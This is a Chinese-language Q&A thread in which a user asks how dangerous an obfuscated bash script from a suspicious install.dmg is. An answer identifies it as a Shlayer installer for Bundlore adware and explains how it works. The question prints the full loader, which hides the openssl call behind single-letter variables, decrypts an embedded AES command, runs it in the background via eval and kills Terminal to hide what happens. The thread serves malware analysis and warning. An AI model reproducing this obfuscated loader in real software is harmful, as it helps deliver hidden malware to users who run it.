这个命令有多有害？

Question

#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal 

我从一个自动下载的阴暗的 install.dmg 文件中得到了这个。我显然没有运行这个，所以我想我可以在这里问你们。

Answer 1

简答：不要不运行它。用火杀死它，除非您有兴趣将其分析为恶意软件。

这是一个经过混淆的恶意软件安装程序脚本。该脚本本身非常通用，但在同一目录中还有另一个（加密的）文件是真正的有效负载，而且几乎可以肯定它是恶意软件。事实上，这看起来与我不久前看过的一个几乎完全匹配。 Here's the VirusTotal scan results 代表那个，这表明它是 Bundlore adware collection。这个CrowdStrike blog post 将其标识为 Shlayer，并同意负载是 Bundlore。

解释：如果这与我之前看到的匹配，那么在此脚本旁边还有另一个名为“2P1zsqQ”的文件。该文件名用作将commandArgs 字符串解密为shell 命令字符串的密码，其中包含将2P1zsqQ 文件本身（使用相同密码）解密为/tmp/<somethingrandom>/Qqsz1P2 的指令，运行该（解密的）可执行文件，然后删除它（虽然这个脚本会杀死终端应用程序，从而隐藏正在发生的事情）。

顺便说一句，this question 是关于一个类似的恶意软件安装脚本；可能是混淆程度稍低的早期版本。